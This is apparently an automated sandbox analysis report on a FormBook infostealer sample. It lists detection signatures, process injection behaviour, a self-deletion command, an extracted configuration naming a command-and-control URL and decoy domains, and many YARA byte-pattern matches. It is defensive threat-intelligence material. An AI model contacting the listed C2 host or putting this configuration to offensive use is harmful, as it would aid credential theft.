Edit tour

Windows Analysis Report
7pECKdsaig.exe

Overview

General Information

Sample Name:	7pECKdsaig.exe
Original Sample Name:	3343ba4097fe8b6b91af0ca46abb0baf6052acf1806571432cc7e9e0ba59fa2a.exe
Analysis ID:	830326
MD5:	515bf958f062fec724fbe6bdadf39485
SHA1:	50fbaeb36e98338dc500e252855abf0152bb6bbf
SHA256:	3343ba4097fe8b6b91af0ca46abb0baf6052acf1806571432cc7e9e0ba59fa2a
Tags:	exeFormbook
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Yara detected FormBook

Malicious sample detected (through community Yara rule)

Antivirus / Scanner detection for submitted sample

System process connects to network (likely due to code injection or exploit)

Antivirus detection for URL or domain

Snort IDS alert for network traffic

Sample uses process hollowing technique

Maps a DLL or memory area into another process

Machine Learning detection for sample

Modifies the prolog of user mode functions (user mode inline hooks)

Queues an APC in another process (thread injection)

Tries to detect virtualization through RDTSC time measurements

Modifies the context of a thread in another process (thread injection)

C2 URLs / IPs found in malware configuration

Uses 32bit PE files

Found decision node followed by non-executed suspicious APIs

Yara signature match

Antivirus or Machine Learning detection for unpacked file

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to call native functions

HTTP GET or POST without a user agent

Contains functionality for execution timing, often used to detect debuggers

Enables debug privileges

Creates a DirectInput object (often for capturing keystrokes)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

PE file does not import any functions

Sample file is different than original file name gathered from version info

Contains functionality to read the PEB

Checks if the current process is being debugged

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64

7pECKdsaig.exe (PID: 6000 cmdline: C:\Users\user\Desktop\7pECKdsaig.exe MD5: 515BF958F062FEC724FBE6BDADF39485)

explorer.exe (PID: 3452 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)

msdt.exe (PID: 5148 cmdline: C:\Windows\SysWOW64\msdt.exe MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)

cmd.exe (PID: 1328 cmdline: /c del "C:\Users\user\Desktop\7pECKdsaig.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 3660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://asec.ahnlab.com/en/32149/ https://blog.360totalsecurity.com/en/bayworld-event-cyber-attack-against-foreign-trade-industry/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.2348x.com/ar73/"], "decoy": ["classgorilla.com", "b6817.com", "1wwuwa.top", "dgslimited.africa", "deepwaterships.com", "hkshshoptw.shop", "hurricanevalleyatvjamboree.com", "ckpconsulting.com", "laojiangmath.com", "authenticityhacking.com", "family-doctor-53205.com", "investinstgeorgeut.com", "lithoearthsolution.africa", "quickhealcareltd.co.uk", "delightkgrillw.top", "freezeclosettoilet.com", "coo1star.com", "gemgamut.com", "enrichednetworksolutions.com", "betterbeeclean.com", "kbmstr.com", "colorusainc.com", "five-dollar-meals.com", "baozhuang8.com", "la-home-service.com", "innovantexclusive.com", "chateaudevillars.co.uk", "echadholisticbar.com", "naijacarprices.africa", "4652.voto", "kraftheonz.com", "ingrambaby.com", "braeunungsoel.ch", "sweetcariadgifts.co.uk", "kui693.com", "akatov-top.ru", "epollresearch.online", "cupandsaucybooks.com", "arredobagno.club", "gt.sale", "dskincare.com", "cursosemcasa.site", "leaf-spa.net", "deathbeforedeceit.com", "azvvs.com", "laptops-39165.com", "ccwt.vip", "011965.com", "mtevz.online", "jacksontcpassettlement.com", "aldeajerusalen.com", "kellnovaglobalfood.info", "alphametatek.online", "lcssthh.com", "dumelogold9ja.africa", "d-storic.com", "mogi.africa", "ghostt.net", "aksharsigns.online", "goglucofort.com", "b708.com", "controlplus.systems", "lightandstory.info", "invstcai.sbs"]}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
7pECKdsaig.exe	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
7pECKdsaig.exe	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
7pECKdsaig.exe	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5651:$a1: 3C 30 50 4F 53 54 74 09 40 0x1bfb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x9dbf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x14ca7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
7pECKdsaig.exe	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8d08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8f72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14aa5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14591:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14ba7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14d1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x998a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1380c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa683:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1ad17:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1bd1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
7pECKdsaig.exe	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17c39:$sqlite3step: 68 34 1C 7B E1 0x17d4c:$sqlite3step: 68 34 1C 7B E1 0x17c68:$sqlite3text: 68 38 2A 90 C5 0x17d8d:$sqlite3text: 68 38 2A 90 C5 0x17c7b:$sqlite3blob: 68 53 D8 7F 8C 0x17da3:$sqlite3blob: 68 53 D8 7F 8C

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1bbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x99bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x148a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x958a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1a917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1b91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17839:$sqlite3step: 68 34 1C 7B E1 0x1794c:$sqlite3step: 68 34 1C 7B E1 0x17868:$sqlite3text: 68 38 2A 90 C5 0x1798d:$sqlite3text: 68 38 2A 90 C5 0x1787b:$sqlite3blob: 68 53 D8 7F 8C 0x179a3:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.289101701.0000000001370000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000000.00000002.289101701.0000000001370000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.289101701.0000000001370000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000000.00000002.289101701.0000000001370000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.289101701.0000000001370000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000002.520351827.0000000004FCF000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.520351827.0000000004FCF000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000002.520351827.0000000004FCF000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5e91:$a1: 3C 30 50 4F 53 54 74 09 40 0x1c7f0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa5ff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x154e7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000002.00000002.520351827.0000000004FCF000.00000004.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9548:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x97b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x152e5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14dd1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x153e7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1555f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa1ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1404c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xaec3:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b557:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c55a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.520351827.0000000004FCF000.00000004.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18479:$sqlite3step: 68 34 1C 7B E1 0x1858c:$sqlite3step: 68 34 1C 7B E1 0x184a8:$sqlite3text: 68 38 2A 90 C5 0x185cd:$sqlite3text: 68 38 2A 90 C5 0x184bb:$sqlite3blob: 68 53 D8 7F 8C 0x185e3:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000002.518766538.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.518766538.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000002.518766538.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000002.00000002.518766538.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.518766538.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.289007135.0000000001210000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000000.00000002.289007135.0000000001210000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.289007135.0000000001210000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000000.00000002.289007135.0000000001210000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.289007135.0000000001210000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000000.249149614.0000000000A81000.00000020.00000001.01000000.00000003.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000000.00000000.249149614.0000000000A81000.00000020.00000001.01000000.00000003.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000000.249149614.0000000000A81000.00000020.00000001.01000000.00000003.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1bbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x99bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x148a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000000.00000000.249149614.0000000000A81000.00000020.00000001.01000000.00000003.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x958a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1a917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1b91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000000.249149614.0000000000A81000.00000020.00000001.01000000.00000003.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17839:$sqlite3step: 68 34 1C 7B E1 0x1794c:$sqlite3step: 68 34 1C 7B E1 0x17868:$sqlite3text: 68 38 2A 90 C5 0x1798d:$sqlite3text: 68 38 2A 90 C5 0x1787b:$sqlite3blob: 68 53 D8 7F 8C 0x179a3:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.531047978.000000001389F000.00000004.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000001.00000002.531047978.000000001389F000.00000004.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000002.531047978.000000001389F000.00000004.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5e91:$a1: 3C 30 50 4F 53 54 74 09 40 0x1c7f0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa5ff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x154e7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000001.00000002.531047978.000000001389F000.00000004.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9548:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x97b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x152e5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14dd1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x153e7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1555f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa1ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1404c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xaec3:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b557:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c55a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.531047978.000000001389F000.00000004.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18479:$sqlite3step: 68 34 1C 7B E1 0x1858c:$sqlite3step: 68 34 1C 7B E1 0x184a8:$sqlite3text: 68 38 2A 90 C5 0x185cd:$sqlite3text: 68 38 2A 90 C5 0x184bb:$sqlite3blob: 68 53 D8 7F 8C 0x185e3:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000002.518698032.0000000002EB0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.518698032.0000000002EB0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000002.518698032.0000000002EB0000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000002.00000002.518698032.0000000002EB0000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.518698032.0000000002EB0000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000002.517165647.0000000000580000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.517165647.0000000000580000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000002.517165647.0000000000580000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000002.00000002.517165647.0000000000580000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.517165647.0000000000580000.00000040.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000002.517610096.00000000008C4000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.517610096.00000000008C4000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000002.517610096.00000000008C4000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x59a1:$a1: 3C 30 50 4F 53 54 74 09 40 0x1c300:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa10f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x14ff7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000002.00000002.517610096.00000000008C4000.00000004.00000020.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9058:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x92c2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14df5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x148e1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14ef7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1506f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x9cda:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x13b5c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa9d3:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b067:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c06a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
